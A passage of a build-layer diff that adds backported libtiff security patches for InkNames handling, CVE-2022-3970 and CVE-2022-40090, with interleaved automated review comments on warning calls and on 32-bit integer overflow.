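+- "%s: Invalid InkNames value; expecting %d names, found %d",
+- tif->tif_name,
+- td->td_samplesperpixel,
+- td->td_samplesperpixel-i);
++ "%s: Invalid InkNames value; no NUL at given buffer end location %"PRIu32", after %"PRIu16" ink",
++ tif->tif_name, slen, i);
+ return (0);
+ }
+
+@@ -476,13 +475,61 @@ _TIFFVSetField(TIFF* tif, uint32 tag, va_list ap)
+ _TIFFsetFloatArray(&td->td_refblackwhite, va_arg(ap, float*), 6);
+ break;
+ case TIFFTAG_INKNAMES:
+- v = (uint16) va_arg(ap, uint16_vap);
+- s = va_arg(ap, char*);
+- v = checkInkNamesString(tif, v, s);
+- status = v > 0;
+- if( v > 0 ) {
+- _TIFFsetNString(&td->td_inknames, s, v);
+- td->td_inknameslen = v;
++ {
++ v = (uint16) va_arg(ap, uint16_vap);
++ s = va_arg(ap, char*);
++ uint16 ninksinstring;
++ ninksinstring = countInkNamesString(tif, v, s);
++ status = ninksinstring > 0;
++ if(ninksinstring > 0 ) {
++ _TIFFsetNString(&td->td_inknames, s, v);
++ td->td_inknameslen = v;
++ /* Set NumberOfInks to the value ninksinstring */
++ if (TIFFFieldSet(tif, FIELD_NUMBEROFINKS))
++ {
++ if (td->td_numberofinks != ninksinstring) {
++ TIFFErrorExt(tif->tif_clientdata, module,
++ "Warning %s; Tag %s:\n Value %"PRIu16" of NumberOfInks is different from the number of inks %"PRIu16".\n -> NumberOfInks value adapted to %"PRIu16"",
++ tif->tif_name, fip->field_name, td->td_numberofinks, ninksinstring, ninksinstring);
++ td->td_numberofinks = ninksinstring;
++ }
++ } else {
++ td->td_numberofinks = ninksinstring;
++ TIFFSetFieldBit(tif, FIELD_NUMBEROFINKS);
++ }
++ if (TIFFFieldSet(tif, FIELD_SAMPLESPERPIXEL))
++ {
++ if (td->td_numberofinks != td->td_samplesperpixel) {
++ TIFFErrorExt(tif->tif_clientdata, module,
++ "Warning %s; Tag %s:\n Value %"PRIu16" of NumberOfInks is different from the SamplesPerPixel value %"PRIu16"",
++ tif->tif_name, fip->field_name, td->td_numberofinks, td->td_samplesperpixel);
++ }
++ }
++ }
++ }
++ break;
++ case TIFFTAG_NUMBEROFINKS:
++ v = (uint16)va_arg(ap, uint16_vap);
++ /* If InkNames already set also NumberOfInks is set accordingly and should be equal */
++ if (TIFFFieldSet(tif, FIELD_INKNAMES))
++ {
++ if (v != td->td_numberofinks) {
++ TIFFErrorExt(tif->tif_clientdata, module,
++ "Error %s; Tag %s:\n It is not possible to set the value %"PRIu32" for NumberOfInks\n which is different from the number of inks in the InkNames tag (%"PRIu16")",
++ tif->tif_name, fip->field_name, v, td->td_numberofinks);
++ /* Do not set / overwrite number of inks already set by InkNames case accordingly. */
++ status = 0;
++ }
++ } else {
++ td->td_numberofinks = (uint16)v;
++ if (TIFFFieldSet(tif, FIELD_SAMPLESPERPIXEL))
++ {
++ if (td->td_numberofinks != td->td_samplesperpixel) {
++ TIFFErrorExt(tif->tif_clientdata, module,
++ "Warning %s; Tag %s:\n Value %"PRIu32" of NumberOfInks is different from the SamplesPerPixel value %"PRIu16"",
++ tif->tif_name, fip->field_name, v, td->td_samplesperpixel);
++ }
++ }
+ }
+ break;
+ case TIFFTAG_PERSAMPLE:
+@@ -887,34 +934,6 @@ _TIFFVGetField(TIFF* tif, uint32 tag, va_list ap)
+ if (fip->field_bit == FIELD_CUSTOM) {
+ standard_tag = 0;
+ }
+-
+- if( standard_tag == TIFFTAG_NUMBEROFINKS )
+- {
+- int i;
+- for (i = 0; i < td->td_customValueCount; i++) {
+- uint16 val;
+- TIFFTagValue *tv = td->td_customValues + i;
+- if (tv->info->field_tag != standard_tag)
+- continue;
+- if( tv->value == NULL )
+- return 0;
+- val = *(uint16 *)tv->value;
+- /* Truncate to SamplesPerPixel, since the */
+- /* setting code for INKNAMES assume that there are SamplesPerPixel */
+- /* inknames. */
+- /* Fixes http://bugzilla.maptools.org/show_bug.cgi?id=2599 */
+- if( val > td->td_samplesperpixel )
+- {
+- TIFFWarningExt(tif->tif_clientdata,"_TIFFVGetField",
+- "Truncating NumberOfInks from %u to %u",
+- val, td->td_samplesperpixel);
+- val = td->td_samplesperpixel;
+- }
+- *va_arg(ap, uint16*) = val;
+- return 1;
+- }
+- return 0;
+- }
+
+ switch (standard_tag) {
+ case TIFFTAG_SUBFILETYPE:
+@@ -1092,6 +1111,9 @@ _TIFFVGetField(TIFF* tif, uint32 tag, va_list ap)
+ case TIFFTAG_INKNAMES:
+ *va_arg(ap, char**) = td->td_inknames;
+ break;
++ case TIFFTAG_NUMBEROFINKS:
++ *va_arg(ap, uint16 *) = td->td_numberofinks;
++ break;
+ default:
+ {
+ int i;
+diff --git a/libtiff/tif_dir.h b/libtiff/tif_dir.h
+index e7f0667..7cad679 100644
+--- a/libtiff/tif_dir.h
++++ b/libtiff/tif_dir.h
+@@ -117,6 +117,7 @@ typedef struct {
+ /* CMYK parameters */
+ int td_inknameslen;
+ char* td_inknames;
++ uint16 td_numberofinks; /* number of inks in InkNames string */
+
+ int td_customValueCount;
+ TIFFTagValue *td_customValues;
+@@ -174,6 +175,7 @@ typedef struct {
+ #define FIELD_TRANSFERFUNCTION 44
+ #define FIELD_INKNAMES 46
+ #define FIELD_SUBIFD 49
++#define FIELD_NUMBEROFINKS 50
+ /* FIELD_CUSTOM (see tiffio.h) 65 */
+ /* end of support for well-known tags; codec-private tags follow */
+ #define FIELD_CODEC 66 /* base of codec-private tags */
+diff --git a/libtiff/tif_dirinfo.c b/libtiff/tif_dirinfo.c
+index fbfaaf0..bf7de70 100644
+--- a/libtiff/tif_dirinfo.c
++++ b/libtiff/tif_dirinfo.c
+@@ -104,7 +104,7 @@ tiffFields[] = {
+ { TIFFTAG_SUBIFD, -1, -1, TIFF_IFD8, 0, TIFF_SETGET_C16_IFD8, TIFF_SETGET_UNDEFINED, FIELD_SUBIFD, 1, 1, "SubIFD", (TIFFFieldArray*) &tiffFieldArray },
+ { TIFFTAG_INKSET, 1, 1, TIFF_SHORT, 0, TIFF_SETGET_UINT16, TIFF_SETGET_UNDEFINED, FIELD_CUSTOM, 0, 0, "InkSet", NULL },
+ { TIFFTAG_INKNAMES, -1, -1, TIFF_ASCII, 0, TIFF_SETGET_C16_ASCII, TIFF_SETGET_UNDEFINED, FIELD_INKNAMES, 1, 1, "InkNames", NULL },
+- { TIFFTAG_NUMBEROFINKS, 1, 1, TIFF_SHORT, 0, TIFF_SETGET_UINT16, TIFF_SETGET_UNDEFINED, FIELD_CUSTOM, 1, 0, "NumberOfInks", NULL },
++ { TIFFTAG_NUMBEROFINKS, 1, 1, TIFF_SHORT, 0, TIFF_SETGET_UINT16, TIFF_SETGET_UNDEFINED, FIELD_NUMBEROFINKS, 1, 0, "NumberOfInks", NULL },
+ { TIFFTAG_DOTRANGE, 2, 2, TIFF_SHORT, 0, TIFF_SETGET_UINT16_PAIR, TIFF_SETGET_UNDEFINED, FIELD_CUSTOM, 0, 0, "DotRange", NULL },
+ { TIFFTAG_TARGETPRINTER, -1, -1, TIFF_ASCII, 0, TIFF_SETGET_ASCII, TIFF_SETGET_UNDEFINED, FIELD_CUSTOM, 1, 0, "TargetPrinter", NULL },
+ { TIFFTAG_EXTRASAMPLES, -1, -1, TIFF_SHORT, 0, TIFF_SETGET_C16_UINT16, TIFF_SETGET_UNDEFINED, FIELD_EXTRASAMPLES, 0, 1, "ExtraSamples", NULL },
+diff --git a/libtiff/tif_dirwrite.c b/libtiff/tif_dirwrite.c
+index 9e4d306..a2dbc3b 100644
+--- a/libtiff/tif_dirwrite.c
++++ b/libtiff/tif_dirwrite.c
+@@ -677,6 +677,11 @@ TIFFWriteDirectorySec(TIFF* tif, int isimage, int imagedone, uint64* pdiroff)
+ if (!TIFFWriteDirectoryTagAscii(tif,&ndir,dir,TIFFTAG_INKNAMES,tif->tif_dir.td_inknameslen,tif->tif_dir.td_inknames))
+ goto bad;
+ }
++ if (TIFFFieldSet(tif, FIELD_NUMBEROFINKS))
++ {
++ if (!TIFFWriteDirectoryTagShort(tif, &ndir, dir, TIFFTAG_NUMBEROFINKS, tif->tif_dir.td_numberofinks))
++ goto bad;
++ }
+ if (TIFFFieldSet(tif,FIELD_SUBIFD))
+ {
+ if (!TIFFWriteDirectoryTagSubifd(tif,&ndir,dir))
+diff --git a/libtiff/tif_print.c b/libtiff/tif_print.c
+index a073794..a9f05a7 100644
+--- a/libtiff/tif_print.c
++++ b/libtiff/tif_print.c
+@@ -402,6 +402,10 @@ TIFFPrintDirectory(TIFF* tif, FILE* fd, long flags)
+ }
+ fputs("\n", fd);
+ }
++ if (TIFFFieldSet(tif, FIELD_NUMBEROFINKS)) {
++ fprintf(fd, " NumberOfInks: %d\n",
++ td->td_numberofinks);
++ }
+ if (TIFFFieldSet(tif,FIELD_THRESHHOLDING)) {
+ fprintf(fd, " Thresholding: ");
+ switch (td->td_threshholding) {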
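Review bot: The three messages that begin with "Warning" in the new `TIFFTAG_INKNAMES` and `TIFFTAG_NUMBEROFINKS` cases of `_TIFFVSetField` are reported through `TIFFErrorExt`, although none of those paths clears `status` and the call carries on. A client whose error handler treats any error callback as fatal would then reject a file the library has just corrected or accepted. The text matches a warning call such as `TIFFWarningExt(tif->tif_clientdata, module, ...)`, which the removed `_TIFFVGetField` block used when it truncated NumberOfInks. Only the "Error ... It is not possible to set the value" branch, which sets `status = 0`, is a real error. `_TIFFVSetField` starts and ends outside these hunks, so `module` and `fip` are assumed to be declared there.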
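--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2022-3970.patch
@@ -0,0 +1,45 @@
+From 7e87352217d1f0c77eee7033ac59e3aab08532bb Mon Sep 17 00:00:00 2001
+From: Even Rouault <even.rouault@spatialys.com>
+Date: Tue, 8 Nov 2022 15:16:58 +0100
+Subject: [PATCH] TIFFReadRGBATileExt(): fix (unsigned) integer overflow on
+
+Upstream-Status: Backport [import from debian http://security.debian.org/debian-security/pool/updates/main/t/tiff/tiff_4.1.0+git191117-2~deb10u7.debian.tar.xz ]
+CVE: CVE-2022-3970
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+
+Origin: https://gitlab.com/libtiff/libtiff/-/commit/227500897dfb07fb7d27f7aa570050e62617e3be
+Reviewed-by: Sylvain Beucler <beuc@debian.org>
+Last-Update: 2023-01-17
+
+ strips/tiles > 2 GB
+
+Fixes https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=53137
+
+---
+ libtiff/tif_getimage.c | 8 ++++----
+ 1 file changed, 4 insertions(+), 4 deletions(-)
+
+diff --git a/libtiff/tif_getimage.c b/libtiff/tif_getimage.c
+index 96ab146..0b90dcc 100644
+--- a/libtiff/tif_getimage.c
++++ b/libtiff/tif_getimage.c
+@@ -3042,15 +3042,15 @@ TIFFReadRGBATileExt(TIFF* tif, uint32 col, uint32 row, uint32 * raster, int stop
+ return( ok );
+
+ for( i_row = 0; i_row < read_ysize; i_row++ ) {
+- memmove( raster + (tile_ysize - i_row - 1) * tile_xsize,
+- raster + (read_ysize - i_row - 1) * read_xsize,
++ memmove( raster + (size_t)(tile_ysize - i_row - 1) * tile_xsize,
++ raster + (size_t)(read_ysize - i_row - 1) * read_xsize,
+ read_xsize * sizeof(uint32) );
+- _TIFFmemset( raster + (tile_ysize - i_row - 1) * tile_xsize,
++ _TIFFmemset( raster + (size_t)(tile_ysize - i_row - 1) * tile_xsize+read_xsize,
+ 0, sizeof(uint32) * (tile_xsize - read_xsize) );
+ }
+
+ for( i_row = read_ysize; i_row < tile_ysize; i_row++ ) {
+- _TIFFmemset( raster + (tile_ysize - i_row - 1) * tile_xsize,
++ _TIFFmemset( raster + (size_t)(tile_ysize - i_row - 1) * tile_xsize,
+ 0, sizeof(uint32) * tile_xsize );
+ }
+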
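Review bot: The `(size_t)` casts added to the row-offset products in the two loops of `TIFFReadRGBATileExt` only widen the multiplication where `size_t` is wider than the operands. On a target with a 32-bit `size_t`, `(tile_ysize - i_row - 1) * tile_xsize` is presumably still computed in 32 bits and can wrap as before. Whether the tile dimensions are bounded earlier in the function cannot be seen here, because the function starts outside the hunk. A comment above the first loop would record the assumption, for example `/* offsets computed in size_t: a 32-bit product wraps for tiles > 2 GB; relies on size_t being wider than uint32 */`.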
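--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2022-40090.patch
@@ -0,0 +1,548 @@
+From d385738335deb0c4bb70449f12e411f2203c0d01 Mon Sep 17 00:00:00 2001
+From: Su_Laus <sulau@freenet.de>
+Date: Fri, 2 Sep 2022 21:20:28 +0200
+Subject: [PATCH 1/4] Improved IFD-Loop Handling (fixes #455)
+
+Basic approach:
+- The order in the entire chain must be checked, and not only whether an offset has already been read once.
+- To do this, pairs of directory number and offset are stored and checked.
+- The offset of a directory number can change.
+- TIFFAdvanceDirectory() must also perform an IFD loop check.
+- TIFFCheckDirOffset() is replaced by _TIFFCheckDirNumberAndOffset().
+
+Rules for the check:
+- If an offset is already in the list, it must have the same IFD number. Otherwise it is an IDF loop.
+- If the offset is not in the list and the IFD number is greater than there are list entries, a new list entry is added.
+- Otherwise, the offset of the IFD number is updated.
+
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/tiff/tree/debian/patches/CVE-2022-40090.patch?h=ubuntu/focal-security
+Upstream commit
+https://gitlab.com/libtiff/libtiff/-/commit/c7caec9a4d8f24c17e667480d2c7d0d51c9fae41]
+CVE: CVE-2022-40090
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ libtiff/tif_close.c | 6 ++-
+ libtiff/tif_dir.c | 91 +++++++++++++++++++++++++----------------
+ libtiff/tif_dir.h | 1 +
+ libtiff/tif_dirread.c | 94 ++++++++++++++++++++++++++++++-------------
+ libtiff/tif_open.c | 3 +-
+ libtiff/tiffiop.h | 3 +-
+ 6 files changed, 131 insertions(+), 67 deletions(-)
+
+--- tiff-4.1.0+git191117.orig/libtiff/tif_close.c
++++ tiff-4.1.0+git191117/libtiff/tif_close.c
+@@ -52,8 +52,10 @@ TIFFCleanup(TIFF* tif)
+ (*tif->tif_cleanup)(tif);
+ TIFFFreeDirectory(tif);
+
+- if (tif->tif_dirlist)
+- _TIFFfree(tif->tif_dirlist);
++ if (tif->tif_dirlistoff)
++ _TIFFfree(tif->tif_dirlistoff);
++ if (tif->tif_dirlistdirn)
++ _TIFFfree(tif->tif_dirlistdirn);
+
+ /*
+ * Clean up client info links.
+--- tiff-4.1.0+git191117.orig/libtiff/tif_dir.c
++++ tiff-4.1.0+git191117/libtiff/tif_dir.c
+@@ -1463,12 +1463,22 @@ TIFFDefaultDirectory(TIFF* tif)
+ }
+
+ static int
+-TIFFAdvanceDirectory(TIFF* tif, uint64* nextdir, uint64* off)
++TIFFAdvanceDirectory(TIFF* tif, uint64* nextdiroff, uint64* off, uint16* nextdirnum)
+ {
+ static const char module[] = "TIFFAdvanceDirectory";
++
++ /* Add this directory to the directory list, if not already in. */
++ if (!_TIFFCheckDirNumberAndOffset(tif, *nextdirnum, *nextdiroff)) {
++ TIFFErrorExt(tif->tif_clientdata, module, "Starting directory %hu at offset 0x%lx (%lu) might cause an IFD loop",
++ *nextdirnum, *nextdiroff, *nextdiroff);
++ *nextdiroff = 0;
++ *nextdirnum = 0;
++ return(0);
++ }
++
+ if (isMapped(tif))
+ {
+- uint64 poff=*nextdir;
++ uint64 poff=*nextdiroff;
+ if (!(tif->tif_flags&TIFF_BIGTIFF))
+ {
+ tmsize_t poffa,poffb,poffc,poffd;
+@@ -1479,7 +1489,7 @@ TIFFAdvanceDirectory(TIFF* tif, uint64*
+ if (((uint64)poffa!=poff)||(poffb<poffa)||(poffb<(tmsize_t)sizeof(uint16))||(poffb>tif->tif_size))
+ {
+ TIFFErrorExt(tif->tif_clientdata,module,"Error fetching directory count");
+- *nextdir=0;
++ *nextdiroff=0;
+ return(0);
+ }
+ _TIFFmemcpy(&dircount,tif->tif_base+poffa,sizeof(uint16));
+@@ -1497,7 +1507,7 @@ TIFFAdvanceDirectory(TIFF* tif, uint64*
+ _TIFFmemcpy(&nextdir32,tif->tif_base+poffc,sizeof(uint32));
+ if (tif->tif_flags&TIFF_SWAB)
+ TIFFSwabLong(&nextdir32);
+- *nextdir=nextdir32;
++ *nextdiroff=nextdir32;
+ }
+ else
+ {
+@@ -1529,11 +1539,10 @@ TIFFAdvanceDirectory(TIFF* tif, uint64*
+ }
+ if (off!=NULL)
+ *off=(uint64)poffc;
+- _TIFFmemcpy(nextdir,tif->tif_base+poffc,sizeof(uint64));
++ _TIFFmemcpy(nextdiroff,tif->tif_base+poffc,sizeof(uint64));
+ if (tif->tif_flags&TIFF_SWAB)
+- TIFFSwabLong8(nextdir);
++ TIFFSwabLong8(nextdiroff);
+ }
+- return(1);
+ }
+ else
+ {
+@@ -1541,7 +1550,7 @@ TIFFAdvanceDirectory(TIFF* tif, uint64*
+ {
+ uint16 dircount;
+ uint32 nextdir32;
+- if (!SeekOK(tif, *nextdir) ||
++ if (!SeekOK(tif, *nextdiroff) ||
+ !ReadOK(tif, &dircount, sizeof (uint16))) {
+ TIFFErrorExt(tif->tif_clientdata, module, "%s: Error fetching directory count",
+ tif->tif_name);
+@@ -1562,13 +1571,13 @@ TIFFAdvanceDirectory(TIFF* tif, uint64*
+ }
+ if (tif->tif_flags & TIFF_SWAB)
+ TIFFSwabLong(&nextdir32);
+- *nextdir=nextdir32;
++ *nextdiroff=nextdir32;
+ }
+ else
+ {
+ uint64 dircount64;
+ uint16 dircount16;
+- if (!SeekOK(tif, *nextdir) ||
++ if (!SeekOK(tif, *nextdiroff) ||
+ !ReadOK(tif, &dircount64, sizeof (uint64))) {
+ TIFFErrorExt(tif->tif_clientdata, module, "%s: Error fetching directory count",
+ tif->tif_name);
+@@ -1588,17 +1597,27 @@ TIFFAdvanceDirectory(TIFF* tif, uint64*
+ else
+ (void) TIFFSeekFile(tif,
+ dircount16*20, SEEK_CUR);
+- if (!ReadOK(tif, nextdir, sizeof (uint64))) {
++ if (!ReadOK(tif, nextdiroff, sizeof (uint64))) {
+ TIFFErrorExt(tif->tif_clientdata, module,
+ "%s: Error fetching directory link",
+ tif->tif_name);
+ return (0);
+ }
+ if (tif->tif_flags & TIFF_SWAB)
+- TIFFSwabLong8(nextdir);
++ TIFFSwabLong8(nextdiroff);
+ }
+- return (1);
+ }
++ if (*nextdiroff != 0) {
++ (*nextdirnum)++;
++ /* Check next directory for IFD looping and if so, set it as last directory. */
++ if (!_TIFFCheckDirNumberAndOffset(tif, *nextdirnum, *nextdiroff)) {
++ TIFFWarningExt(tif->tif_clientdata, module, "the next directory %hu at offset 0x%lx (%lu) might be an IFD loop. Treating directory %hu as last directory",
++ *nextdirnum, *nextdiroff, *nextdiroff, *nextdirnum-1);
++ *nextdiroff = 0;
++ (*nextdirnum)--;
++ }
++ }
++ return (1);
+ }
+
+ /*
+@@ -1608,14 +1627,16 @@ uint16
+ TIFFNumberOfDirectories(TIFF* tif)
+ {
+ static const char module[] = "TIFFNumberOfDirectories";
+- uint64 nextdir;
++ uint64 nextdiroff;
++ uint16 nextdirnum;
+ uint16 n;
+ if (!(tif->tif_flags&TIFF_BIGTIFF))
+- nextdir = tif->tif_header.classic.tiff_diroff;
++ nextdiroff = tif->tif_header.classic.tiff_diroff;
+ else
+- nextdir = tif->tif_header.big.tiff_diroff;
++ nextdiroff = tif->tif_header.big.tiff_diroff;
++ nextdirnum = 0;
+ n = 0;
+- while (nextdir != 0 && TIFFAdvanceDirectory(tif, &nextdir, NULL))
++ while (nextdiroff != 0 && TIFFAdvanceDirectory(tif, &nextdiroff, NULL, &nextdirnum))
+ {
+ if (n != 65535) {
+ ++n;
+@@ -1638,28 +1659,30 @@ TIFFNumberOfDirectories(TIFF* tif)
+ int
+ TIFFSetDirectory(TIFF* tif, uint16 dirn)
+ {
+- uint64 nextdir;
++ uint64 nextdiroff;
++ uint16 nextdirnum;
+ uint16 n;
+
+ if (!(tif->tif_flags&TIFF_BIGTIFF))
+- nextdir = tif->tif_header.classic.tiff_diroff;
++ nextdiroff = tif->tif_header.classic.tiff_diroff;
+ else
+- nextdir = tif->tif_header.big.tiff_diroff;
+- for (n = dirn; n > 0 && nextdir != 0; n--)
+- if (!TIFFAdvanceDirectory(tif, &nextdir, NULL))
++ nextdiroff = tif->tif_header.big.tiff_diroff;
++ nextdirnum = 0;
++ for (n = dirn; n > 0 && nextdiroff != 0; n--)
++ if (!TIFFAdvanceDirectory(tif, &nextdiroff, NULL, &nextdirnum))
+ return (0);
+- tif->tif_nextdiroff = nextdir;
++ /* If the n-th directory could not be reached (does not exist),
++ * return here without touching anything further. */
++ if (nextdiroff == 0 || n > 0)
++ return (0);
++
++ tif->tif_nextdiroff = nextdiroff;
+ /*
+ * Set curdir to the actual directory index. The
+ * -1 is because TIFFReadDirectory will increment
+ * tif_curdir after successfully reading the directory.
+ */
+ tif->tif_curdir = (dirn - n) - 1;
+- /*
+- * Reset tif_dirnumber counter and start new list of seen directories.
+- * We need this to prevent IFD loops.
+- */
+- tif->tif_dirnumber = 0;
+ return (TIFFReadDirectory(tif));
+ }
+
+@@ -1672,13 +1695,42 @@ TIFFSetDirectory(TIFF* tif, uint16 dirn)
+ int
+ TIFFSetSubDirectory(TIFF* tif, uint64 diroff)
+ {
+- tif->tif_nextdiroff = diroff;
+- /*
+- * Reset tif_dirnumber counter and start new list of seen directories.
+- * We need this to prevent IFD loops.
++ /* Match nextdiroff and curdir for consistent IFD-loop checking.
++ * Only with TIFFSetSubDirectory() the IFD list can be corrupted with invalid offsets
++ * within the main IFD tree.
++ * In the case of several subIFDs of a main image,
++ * there are two possibilities that are not even mutually exclusive.
++ * a.) The subIFD tag contains an array with all offsets of the subIFDs.
++ * b.) The SubIFDs are concatenated with their NextIFD parameters.
++ * (refer to https://www.awaresystems.be/imaging/tiff/specification/TIFFPM6.pdf.)
+ */
+- tif->tif_dirnumber = 0;
+- return (TIFFReadDirectory(tif));
++ int retval;
++ uint16 curdir = 0;
++ int8 probablySubIFD = 0;
++ if (diroff == 0) {
++ /* Special case to invalidate the tif_lastdiroff member. */
++ tif->tif_curdir = 65535;
++ } else {
++ if (!_TIFFGetDirNumberFromOffset(tif, diroff, &curdir)) {
++ /* Non-existing offsets might point to a SubIFD or invalid IFD.*/
++ probablySubIFD = 1;
++ }
++ /* -1 because TIFFReadDirectory() will increment tif_curdir. */
++ tif->tif_curdir = curdir - 1;
++ }
++
++ tif->tif_nextdiroff = diroff;
++ retval = TIFFReadDirectory(tif);
++ /* If failed, curdir was not incremented in TIFFReadDirectory(), so set it back. */
++ if (!retval )tif->tif_curdir++;
++ if (retval && probablySubIFD) {
++ /* Reset IFD list to start new one for SubIFD chain and also start SubIFD chain with tif_curdir=0. */
++ tif->tif_dirnumber = 0;
++ tif->tif_curdir = 0; /* first directory of new chain */
++ /* add this offset to new IFD list */
++ _TIFFCheckDirNumberAndOffset(tif, tif->tif_curdir, diroff);
++ }
++ return (retval);
+ }
+
+ /*
+@@ -1702,12 +1754,15 @@ TIFFLastDirectory(TIFF* tif)
+
+ /*
+ * Unlink the specified directory from the directory chain.
++ * Note: First directory starts with number dirn=1.
++ * This is different to TIFFSetDirectory() where the first directory starts with zero.
+ */
+ int
+ TIFFUnlinkDirectory(TIFF* tif, uint16 dirn)
+ {
+ static const char module[] = "TIFFUnlinkDirectory";
+ uint64 nextdir;
++ uint16 nextdirnum;
+ uint64 off;
+ uint16 n;
+
+@@ -1731,19 +1786,21 @@ TIFFUnlinkDirectory(TIFF* tif, uint16 di
+ nextdir = tif->tif_header.big.tiff_diroff;
+ off = 8;
+ }
++ nextdirnum = 0; /* First directory is dirn=0 */
++
+ for (n = dirn-1; n > 0; n--) {
+ if (nextdir == 0) {
+ TIFFErrorExt(tif->tif_clientdata, module, "Directory %d does not exist", dirn);
+ return (0);
+ }
+- if (!TIFFAdvanceDirectory(tif, &nextdir, &off))
++ if (!TIFFAdvanceDirectory(tif, &nextdir, &off, &nextdirnum))
+ return (0);
+ }
+ /*
+ * Advance to the directory to be unlinked and fetch
+ * the offset of the directory that follows.
+ */
+- if (!TIFFAdvanceDirectory(tif, &nextdir, NULL))
++ if (!TIFFAdvanceDirectory(tif, &nextdir, NULL, &nextdirnum))
+ return (0);
+ /*
+ * Go back and patch the link field of the preceding
+--- tiff-4.1.0+git191117.orig/libtiff/tif_dir.h
++++ tiff-4.1.0+git191117/libtiff/tif_dir.h
+@@ -300,6 +300,8 @@ extern int _TIFFMergeFields(TIFF*, const
+ extern const TIFFField* _TIFFFindOrRegisterField(TIFF *, uint32, TIFFDataType);
+ extern TIFFField* _TIFFCreateAnonField(TIFF *, uint32, TIFFDataType);
+ extern int _TIFFCheckFieldIsValidForCodec(TIFF *tif, ttag_t tag);
++extern int _TIFFCheckDirNumberAndOffset(TIFF *tif, uint16 dirn, uint64 diroff);
++extern int _TIFFGetDirNumberFromOffset(TIFF *tif, uint64 diroff, uint16 *dirn);
+
+ #if defined(__cplusplus)
+ }
+--- tiff-4.1.0+git191117.orig/libtiff/tif_dirread.c
++++ tiff-4.1.0+git191117/libtiff/tif_dirread.c
+@@ -158,7 +158,6 @@ static void TIFFReadDirectoryFindFieldIn
+
+ static int EstimateStripByteCounts(TIFF* tif, TIFFDirEntry* dir, uint16 dircount);
+ static void MissingRequired(TIFF*, const char*);
+-static int TIFFCheckDirOffset(TIFF* tif, uint64 diroff);
+ static int CheckDirCount(TIFF*, TIFFDirEntry*, uint32);
+ static uint16 TIFFFetchDirectory(TIFF* tif, uint64 diroff, TIFFDirEntry** pdir, uint64* nextdiroff);
+ static int TIFFFetchNormalTag(TIFF*, TIFFDirEntry*, int recover);
+@@ -3584,12 +3583,19 @@ TIFFReadDirectory(TIFF* tif)
+ int bitspersample_read = FALSE;
+ int color_channels;
+
+- tif->tif_diroff=tif->tif_nextdiroff;
+- if (!TIFFCheckDirOffset(tif,tif->tif_nextdiroff))
+- return 0; /* last offset or bad offset (IFD looping) */
+- (*tif->tif_cleanup)(tif); /* cleanup any previous compression state */
+- tif->tif_curdir++;
+- nextdiroff = tif->tif_nextdiroff;
++ if (tif->tif_nextdiroff == 0) {
++ /* In this special case, tif_diroff needs also to be set to 0. */
++ tif->tif_diroff = tif->tif_nextdiroff;
++ return 0; /* last offset, thus no checking necessary */
++ }
++
++ nextdiroff = tif->tif_nextdiroff;
++ /* tif_curdir++ and tif_nextdiroff should only be updated after SUCCESSFUL reading of the directory. Otherwise, invalid IFD offsets could corrupt the IFD list. */
++ if (!_TIFFCheckDirNumberAndOffset(tif, tif->tif_curdir + 1, nextdiroff)) {
++ TIFFWarningExt(tif->tif_clientdata, module,
++ "Didn't read next directory due to IFD looping at offset 0x%lx (%lu) to offset 0x%lx (%lu)", tif->tif_diroff, tif->tif_diroff, nextdiroff, nextdiroff);
++ return 0; /* bad offset (IFD looping) */
++ }
+ dircount=TIFFFetchDirectory(tif,nextdiroff,&dir,&tif->tif_nextdiroff);
+ if (!dircount)
+ {
+@@ -3597,6 +3603,11 @@ TIFFReadDirectory(TIFF* tif)
+ "Failed to read directory at offset " TIFF_UINT64_FORMAT,nextdiroff);
+ return 0;
+ }
++ /* Set global values after a valid directory has been fetched.
++ * tif_diroff is already set to nextdiroff in TIFFFetchDirectory() in the beginning. */
++ tif->tif_curdir++;
++ (*tif->tif_cleanup)(tif); /* cleanup any previous compression state */
++
+ TIFFReadDirectoryCheckOrder(tif,dir,dircount);
+
+ /*
+@@ -4628,13 +4639,17 @@ MissingRequired(TIFF* tif, const char* t
+ }
+
+ /*
+- * Check the directory offset against the list of already seen directory
+- * offsets. This is a trick to prevent IFD looping. The one can create TIFF
+- * file with looped directory pointers. We will maintain a list of already
+- * seen directories and check every IFD offset against that list.
++ * Check the directory number and offset against the list of already seen
++ * directory numbers and offsets. This is a trick to prevent IFD looping.
++ * The one can create TIFF file with looped directory pointers. We will
++ * maintain a list of already seen directories and check every IFD offset
++ * and its IFD number against that list. However, the offset of an IFD number
++ * can change - e.g. when writing updates to file.
++ * Returns 1 if all is ok; 0 if last directory or IFD loop is encountered,
++ * or an error has occured.
+ */
+-static int
+-TIFFCheckDirOffset(TIFF* tif, uint64 diroff)
++int
++_TIFFCheckDirNumberAndOffset(TIFF* tif, uint16 dirn, uint64 diroff)
+ {
+ uint16 n;
+
+@@ -4646,35 +4661,64 @@ TIFFCheckDirOffset(TIFF* tif, uint64 dir
+ return 0;
+ }
+
+- for (n = 0; n < tif->tif_dirnumber && tif->tif_dirlist; n++) {
+- if (tif->tif_dirlist[n] == diroff)
+- return 0;
++ /* Check if offset is already in the list:
++ * - yes: check, if offset is at the same IFD number - if not, it is an IFD loop
++ * - no: add to list or update offset at that IFD number
++ */
++ for (n = 0; n < tif->tif_dirnumber && tif->tif_dirlistdirn && tif->tif_dirlistoff; n++) {
++ if (tif->tif_dirlistoff[n] == diroff) {
++ if (tif->tif_dirlistdirn[n] == dirn) {
++ return 1;
++ } else {
++ TIFFWarningExt(tif->tif_clientdata, "_TIFFCheckDirNumberAndOffset",
++ "TIFF directory %hu has IFD looping to directory %hu at offset 0x%lx (%lu)",
++ dirn-1, tif->tif_dirlistdirn[n], diroff, diroff);
++ return 0;
++ }
++ }
++ }
++ /* Check if offset of an IFD has been changed and update offset of that IFD number. */
++ if (dirn < tif->tif_dirnumber && tif->tif_dirlistdirn && tif->tif_dirlistoff) {
++ /* tif_dirlistdirn can have IFD numbers dirn in random order */
++ for (n = 0; n < tif->tif_dirnumber; n++) {
++ if (tif->tif_dirlistdirn[n] == dirn) {
++ tif->tif_dirlistoff[n] = diroff;
++ return 1;
++ }
++ }
+ }
+
++ /* Add IFD offset and dirn to IFD directory list */
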